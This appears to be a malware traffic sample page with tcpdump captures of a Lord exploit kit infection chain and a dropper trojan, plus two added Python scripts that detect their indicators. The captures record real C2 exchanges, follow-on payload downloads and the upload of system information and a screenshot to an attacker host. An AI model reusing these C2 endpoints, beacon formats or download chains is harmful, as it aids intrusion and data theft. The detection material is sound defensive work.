2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460
[1460 bytes of the Server.exe body; binary, not printable]
2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460
[1460 bytes of the Server.exe body; binary, not printable]
2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460
[1460 bytes of the Server.exe body; binary, not printable]

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{"uid":"d708005f8b8c91d1"}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{"response":"","code":0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

[start of the 1844-byte POST body; binary, not printable]
2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
[remainder of the POST body; binary, not printable]
2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe's Flash Player, Malwarebytes security researchers say.

Dubbed "Lord," the exploit kit (EK) was initially identified by Virus Bulletin's Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it.

The landing page has a function that checks for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability. One thing that sets the Lord EK apart from other toolkits is its use of the ngrok service to craft custom hostnames, which results in rather unusual URLs. Source: https://www.securityweek.com/new-lord-exploit-kit-emerges
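
The two traits just described, a landing page on a throwaway ngrok.io hostname and a Flash check that leads to a .swf fetch, are exactly what the captures on this page show (the `.swf` request carries `x-flash-version: 28,0,0,161` and a `Referer` back to the landing URL, and the exploit is followed by `GET /Server.exe` from a bare ip:port host with the `wininet` User-Agent). The Python below is an added example, not Malwarebytes' or SecurityWeek's code: it runs those checks over HTTP request records of the kind a proxy log or a Zeek `http.log` would give. `SAMPLE_REQUESTS` is constructed from the headers in the capture above plus one benign control; the fixed Flash build `FIXED_FLASH` (32.0.0.101, the build Adobe shipped for CVE-2018-15982 in bulletin APSB18-42) is an assumption stated in the code rather than something this page gives.

```python
"""Detect the Lord EK chain in HTTP request logs: a .swf fetched from an
ngrok.io host, referred by a landing page on the same host, by a Flash
Player older than the CVE-2018-15982 fix, and the follow-on .exe pulled
from a bare ip:port host with the 'wininet' User-Agent.  Added example,
not Malwarebytes' or SecurityWeek's code.  SAMPLE_REQUESTS is constructed
from the headers in the capture above; FIXED_FLASH is an assumption."""
from __future__ import annotations
import re

FIXED_FLASH = (32, 0, 0, 101)  # assumed: first Flash build carrying the CVE-2018-15982 fix

# Constructed request records: (Host header, request path, other headers), in arrival order.
SAMPLE_REQUESTS = [
    ("57189bbb.ngrok.io",
     "/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3",
     {"Accept": "text/html, application/xhtml+xml, */*"}),
    ("57189bbb.ngrok.io", "/?jS3YdHCaSi9dJ.swf",
     {"Accept": "*/*", "x-flash-version": "28,0,0,161",
      "Referer": "http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3"}),
    ("81.171.31.247:4567", "/Server.exe", {"User-Agent": "wininet"}),
    # Benign control: a patched client fetching a .swf from an ordinary site.
    ("www.example.com", "/player.swf",
     {"Accept": "*/*", "x-flash-version": "32,0,0,114"}),
]

NGROK_HOST_RE = re.compile(r"\.ngrok\.io$", re.I)
IP_PORT_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}$")


def parse_flash_version(header: str) -> tuple[int, ...]:
    """The x-flash-version header is comma separated: '28,0,0,161' -> (28, 0, 0, 161)."""
    return tuple(int(p) for p in header.split(","))


def is_vulnerable_flash(header: str) -> bool:
    """True when the client's Flash build predates the assumed fix level."""
    return parse_flash_version(header) < FIXED_FLASH


def _lower_headers(headers: dict) -> dict:
    return {k.lower(): v for k, v in headers.items()}


def lord_ek_alerts(requests) -> list[str]:
    """One alert per .swf request that fits the exploit stage of the chain."""
    alerts = []
    for host, path, headers in requests:
        h = _lower_headers(headers)
        if not (path.lower().endswith(".swf") and NGROK_HOST_RE.search(host)):
            continue
        ver = h.get("x-flash-version")
        ref = h.get("referer", "")
        same_host_ref = ref.startswith((f"http://{host}/", f"https://{host}/"))
        if ver and is_vulnerable_flash(ver) and same_host_ref:
            alerts.append(f"Lord EK exploit stage: {host}{path} by Flash {ver}, landing page {ref}")
    return alerts


def payload_download_alerts(requests) -> list[str]:
    """One alert per .exe fetched from a bare ip:port Host with the 'wininet' User-Agent."""
    alerts = []
    for host, path, headers in requests:
        h = _lower_headers(headers)
        if (IP_PORT_HOST_RE.match(host) and path.lower().endswith(".exe")
                and h.get("user-agent", "").lower() == "wininet"):
            alerts.append(f"Lord EK payload stage: http://{host}{path}")
    return alerts


if __name__ == "__main__":
    for line in lord_ek_alerts(SAMPLE_REQUESTS) + payload_download_alerts(SAMPLE_REQUESTS):
        print(line)
```

Requiring all three conditions on the .swf request (ngrok host, same-host Referer, vulnerable version) keeps the rule quiet on ordinary Flash content, while the patched control record shows that a current client hitting the same kind of URL is not flagged.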

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
..P. .?….yrP…….@……….t…..H.F………82A……..F…..”A..7….X.F…..”A..&….d.F.3.ZYYd..h..A………]…d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F.p…d.F.q…d.F.r…d.F.s…d.F.t…d.F.u…
d.F.v…d.F.w…d.F.x…d.F.y…d.F.z…d.F.{…d.F.|…d.F.}…d.F.~…d.F…..d.F.`…d.F.a…d.F.b…d.F.c…d.F.d…d.F.e…d.F.f…d.F.g…d.F.h…d.F.i…d.F.j…d.F.k…d.F.l…d.F.m…d.F.n…d.F.o…d.F.P…d.F.Q…d.F.R…d.F
.S…d.F.T…d.F.U…d.F.V…d.F.W…d.F.X…d.F.Y…d.F.Z…d.F.[…d.F….d.F.]…d.F.^…d.F._…d.F.@…d.F.A…d.F.B…d.F.C…d.F.D…d.F.E…d.F.F…d.F.G…d.F.H…d.F.I…d.F.J…d.F.K…d.F.L…d.F.M…d.F.N…d.F.O…d.F.0.
..d.F.1…d.F.2…d.F.3…d.F.4…d.F.5…d.F.6…d.F.7…d.F.8…d.F.9…d.F.:…d.F.;…d.F.<…U..3.Uh..A.d.0d. ….F.3.ZYYd..h..A…6…..]….-..F…..A…TColor……….@.4.A………………………..4.A…..@w@..;@..;@..;@.. <@..;@.(9@.D9@..9@..EInvalidGraphic..A………………………….A…..@w@..;@..;@..;@..<@..;@.(9@.D9@..9@..EInvalidGraphicOperation.@…A.. TFontPitch………..A. fpDefault fpVariable.fpFixed.Graphics…A. TFontName…A…TFontCharset………. .A.. TFontStyle………..A..fsBold.fsItalic.fsUnderline.fsStrikeOut.Graphics..p.A…TFontStyles…A…..A.. TPenStyle………..A..psSolid.psDash.psDot psDashDot.psDashDotDot.psClear.psInsideFrame.Graphics…A…TPenMode………..A..p mBlack.pmWhite.pmNop.pmNot.pmCopy pmNotCopy.pmMergePe 2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
E .j..@.4…….
.
..P.%V...M..P…8P……..znN..i..(..8G….$……. …G.).api-ms-win-core-file-l2-1-0.dll . ………d0.^....R^%.....R^%....PK...........znNB.p.a(..8G..!.$....... ...Z.*.api-ms-win-core-handle-l1-1-0.dll . .........nW.^…..^%……^%….PK………..znN ..q.)..8G….$……. ….?.api-ms-win-core-heap-l1-1-0.dll
. ………nW.^...G._%....G._%....PK...........znN...##'...E..&.$....... ...:i*.api-ms-win-core-interlocked-l1-1-0.dll . ..........~.^…y.%….y.%….PK………..znNL…J)..8I..(.$……. …...api-ms-win-core-libraryloader-l1-1-0.dll . ……….~.^.....%……%....PK...........znN.....+..8Q..'.$....... ...1.*.api-ms-win-core-localization-l1-2-0.dll . ............^….N%.....N%….PK………..znN1….)..8I..!.$……. …?..api-ms-win-core-memory-l1-1-0.dll
. …………^.....%……`%….PK……:.:.t…..+…
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
E…..@…..
.
……$.P>….e..P.?.f…….8..b..Hl
.giT…BX:..D..7Y%3.4
…~$Z.8….K.u6.T………H….0}………….](..J.wK..b.Is…..@..}……….}o…..h..j..HP.JT.”..’B.A_u.hn”..S…;..R;..!.
-.fual[.MZ.L.qn.W.s.9.t=….C..S.=…@.M…fW4,w..4y.d-…/…….T..bf.2M…….eWoh…,./….;?+.S.PP.C...I.........K....[ RM.q. jTx.x... 8:W<!.+..j.4..(....W...."..O.......zD^.].....[..i..F.=.B..0.1.>..1..'...J.........0V..5.. c..._..3..>_.../ ..+N..X...v.H..R.....{I,..u..Z.^..\.E.$. ~...[5. ^o...P.bY.h.......w...$+.~t..57.0g...e.V%Q.R..M3..fm-1...]o+.x.F....E....W.......R.W.(..|.......<b.8..}7..:.>...srt6.r.....B.. U?V.$y.{..{..(..7.....r&%..u)D.V.C]..." ..y...&]7......@.%t&.{W. UZZ..#.....K.N..N@.;....o{...W.yl..E>.xT.D.^._...'9.p.Qw.?.....1V=..M...{W.vr)Tg.....Sp...g.....+."..............e...U...{...D0iZ...,.... ...].G2.......K …#….E.l.]..UN.v)……W gt.c..f}.Q….]..)6.…]..0………Fi.{ 4a&K……..6#…….nK.’.;……U..Z……e.|.Yb…’….z…..GVRI.F.8…PK………….NF.i……….. ……. …….System Info.txtUT….4.\PK………….N….Z…….
. ……. …….screen.pngUT….4.\PK…………..n…..
--Jfbvjwj3489078yuyetu--
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true"success"
0
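Both captures above are tcpdump -A output, and the indicators a responder actually wants (the throwaway ngrok.io hostname the Lord EK landing page resolved, the base64-encoded bot_id/config_id beacon the dropper POSTs to /gate/log.php, and the download URLs and victim IP the gate hands back as JSON) sit between long payload dumps. The Python script below, added here as an example and not code from the page or its author, pulls those out of text in this format. SAMPLE is constructed from abbreviated lines of the two samples above (the JSON body re-typed with plain ASCII quotes); the function names and the regexes are this example's own.

```python
"""Pull indicators out of tcpdump -A style output like the samples above.

Added example for this page, not code from the page's author. SAMPLE is
constructed from lines of the two captures on the page, abbreviated.
"""
import base64
import json
import re
from urllib.parse import parse_qs

SAMPLE = """\
2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
......$.P>....e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}
"""

# tcpdump summary line: "<timestamp> IP <src>.<sport> > <dst>.<dport>: <rest>"
PACKET_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): (?P<rest>.*)$"
)
# "46499+ A? 7b2cdd48.ngrok.io. (35)" -> qname without the trailing root dot
DNS_QUERY_RE = re.compile(r"\bA\? (?P<qname>[A-Za-z0-9.-]+?)\.? \(\d+\)$")
# the dropper's form body: params=<base64>
PARAMS_RE = re.compile(r"params=(?P<b64>[A-Za-z0-9+/]+=*)")
REQUEST_RE = re.compile(r"HTTP: ((?:GET|POST) \S+ HTTP/1\.[01])$")


def parse_packets(text):
    """One dict per tcpdump summary line; payload dump lines are skipped."""
    return [m.groupdict() for m in map(PACKET_RE.match, text.splitlines()) if m]


def ngrok_lookups(packets):
    """(ts, client, qname) for every DNS A query to a *.ngrok.io hostname.

    Lord EK minted throwaway ngrok hostnames (7b2cdd48.ngrok.io in the sample);
    a tunnel-service hostname resolved from a user workstation merits an alert.
    """
    hits = []
    for p in packets:
        if p["dport"] != "53":
            continue
        m = DNS_QUERY_RE.search(p["rest"])
        if m and m.group("qname").lower().endswith(".ngrok.io"):
            hits.append((p["ts"], p["src"], m.group("qname")))
    return hits


def http_requests(packets):
    """(ts, client, server:port, request line) for each packet tcpdump tagged as a request."""
    out = []
    for p in packets:
        m = REQUEST_RE.search(p["rest"])
        if m:
            out.append((p["ts"], p["src"], f'{p["dst"]}:{p["dport"]}', m.group(1)))
    return out


def decode_beacon(text):
    """Decode the base64 'params=' body POSTed to /gate/log.php.

    The decoded payload is itself a query string: bot_id, config_id, data.
    """
    m = PARAMS_RE.search(text)
    if not m:
        return None
    raw = base64.b64decode(m.group("b64")).decode("ascii", "replace")
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def gate_response_indicators(text):
    """Download URLs and the victim's public IP from the gate's JSON reply."""
    for line in text.splitlines():
        if line.startswith("{") and line.rstrip().endswith("}"):
            try:
                doc = json.loads(line)
            except ValueError:
                continue
            urls = [v for v in doc.values() if isinstance(v, str) and v.startswith("http")]
            return {"urls": urls, "victim_ip": doc.get("ip"), "config": doc.get("config")}
    return None


def analyze(text):
    """Summarise a capture: ngrok lookups, HTTP requests, decoded beacon, gate reply."""
    packets = parse_packets(text)
    return {
        "ngrok": ngrok_lookups(packets),
        "requests": http_requests(packets),
        "beacon": decode_beacon(text),
        "gate": gate_response_indicators(text),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(key, value)
```

The decoded beacon carries a per-host bot_id and a config_id, which is what makes this exchange a good pivot: the same config_id turning up from several hosts ties them to one campaign, and the three URLs in the gate reply (the file handler, sqlite3.dll, libs.zip) are the follow-on downloads to block and hunt for in proxy logs.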